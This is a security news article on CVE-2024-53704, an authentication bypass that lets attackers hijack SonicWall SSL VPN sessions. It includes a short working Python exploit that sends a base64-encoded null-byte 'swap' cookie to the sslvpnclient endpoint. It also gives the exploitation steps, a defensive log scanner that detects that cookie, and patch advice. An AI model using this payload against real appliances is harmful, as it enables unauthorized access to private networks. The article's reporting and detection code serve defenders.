Unpatched SonicWall Firewalls Vulnerability Actively Exploited To Hijack SSL VPN Sessions
- Source: Vulnerability (cybersecuritynews.com)
Author: Tushar Subhra Dutta
A critical vulnerability in SonicWall firewalls, identified as CVE-2024-53704, has been actively exploited by attackers to hijack SSL VPN sessions.
This vulnerability affects SonicOS versions 7.1.x (7.1.1-7058 and older), 7.1.2-7019, and 8.0.0-8035.
The exploit allows a remote attacker to bypass authentication and take control of active SSL VPN client sessions without any credentials.
Bishop Fox researchers noted that the vulnerability lies in the processing of Base64-encoded session cookies within the SSL VPN authentication mechanism.
An incorrect implementation of an authentication algorithm allows attackers to bypass authentication by manipulating these cookies.
Specifically, the getSslvpnSessionFromCookie function is vulnerable due to its handling of null characters in base64-encoded strings.
```python
import base64, requests, urllib3, warnings

# The target uses a self-signed certificate, so TLS verification is disabled
# below; silence the warning that requests emits for verify=False.
warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning)

# Payload creation: Base64-encode 32 null characters. This is the value that
# the vulnerable cookie handler accepts in place of a real session identifier.
payload = base64.b64encode(b"\x00" * 32).decode()

# Exploit script to hijack SSL VPN sessions: present the crafted "swap" cookie
# to the SSL VPN client endpoint without ever authenticating.
resp = requests.get(
    "https://192.168.50.189:4433/cgi-bin/sslvpnclient?launchplatform=",
    cookies={"swap": payload},
    verify=False,
)
print(resp.headers)
print(resp.text)
```
Exploitation Process
- Initial Login: An attacker sends a POST request to /cgi-bin/userLogin with a username, password, domain, and login=true.
- Swap Cookie: The server responds with a Set-Cookie header containing a base64-encoded swap cookie.
- Session Hijacking: The attacker sends a GET request to /cgi-bin/sslvpnclient?launchplatform= with the crafted swap cookie (base64-encoded null characters) to bypass authentication.
The exploitation of CVE-2024-53704 presents severe security implications, as attackers can gain unauthorized access to private networks, view Virtual Office bookmarks, obtain client configuration profiles, and forcibly terminate active sessions.
While detecting this exploitation proves challenging due to the attack’s nature, organizations may implement custom logging configurations to help identify suspicious activities.
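Where the SSL VPN port sits behind a reverse proxy, WAF or packet capture that records request cookies, the payload shape described in the three-step process above is itself a usable indicator. The following is an added example, not code from the article, from Bishop Fox or from SonicWall: it decodes the swap cookie from constructed access-log lines (the log format is an assumption made for this example; SonicWall's own log format is not shown on this page) and flags requests to /cgi-bin/sslvpnclient whose cookie is malformed or decodes to nothing but NUL bytes.

```python
import base64
import binascii
import re
from typing import Optional

# Cookie values used by the constructed sample log below.
# NULL_SESSION_COOKIE is exactly what the exploit sends: 32 NUL bytes, base64-encoded.
NULL_SESSION_COOKIE = base64.b64encode(b"\x00" * 32).decode()
# A stand-in for a legitimately issued cookie (assumed 32-byte opaque value).
REAL_SESSION_COOKIE = base64.b64encode(b"real-session-token-0123456789abc").decode()

# Constructed sample log lines in an assumed generic access-log format:
#   <src-ip> "<method> <path> HTTP/1.1" <status> swap=<cookie value>
SAMPLE_LOG = f"""\
203.0.113.7 "POST /cgi-bin/userLogin HTTP/1.1" 200 swap=
203.0.113.7 "GET /cgi-bin/sslvpnclient?launchplatform= HTTP/1.1" 200 swap={NULL_SESSION_COOKIE}
198.51.100.22 "GET /cgi-bin/sslvpnclient?launchplatform= HTTP/1.1" 200 swap={REAL_SESSION_COOKIE}
192.0.2.9 "GET /cgi-bin/sslvpnclient?launchplatform= HTTP/1.1" 200 swap=not-base64!!
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) swap=(?P<swap>\S*)$'
)


def decode_swap_cookie(value: str) -> Optional[bytes]:
    """Strictly base64-decode a swap cookie; None if it is not valid base64."""
    try:
        return base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None


def classify_swap_cookie(value: str) -> str:
    """Classify a swap cookie value by what it decodes to."""
    raw = decode_swap_cookie(value)
    if raw is None:
        return "malformed"
    if len(raw) == 0:
        return "empty"
    if raw.count(0) == len(raw):
        # Every decoded byte is NUL: the CVE-2024-53704 payload shape.
        return "null-session"
    if b"\x00" in raw:
        # Partially NUL-padded cookies are not what a real login issues either.
        return "embedded-null"
    return "ok"


def scan_log(text: str) -> list:
    """Return one alert per suspicious sslvpnclient request found in the log."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # Only the session-resumption endpoint consumes the swap cookie.
        if not m["path"].startswith("/cgi-bin/sslvpnclient"):
            continue
        verdict = classify_swap_cookie(m["swap"])
        if verdict != "ok":
            alerts.append({"src": m["src"], "verdict": verdict, "status": m["status"]})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

A "null-session" verdict paired with a 200 response from an unpatched appliance is the strongest signal; on a patched firewall the same request should be rejected, so the cookie check still tells you who is probing even after the update.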
SonicWall addressed this vulnerability by releasing critical security patches on January 7, 2025, and organizations are strongly encouraged to apply these updates without delay.
The patched firewalls are designed to automatically reject any exploitation attempts.
So, it’s crucial to maintain robust security measures and implement timely patches, especially as threat actors continue to target vulnerabilities in network infrastructure.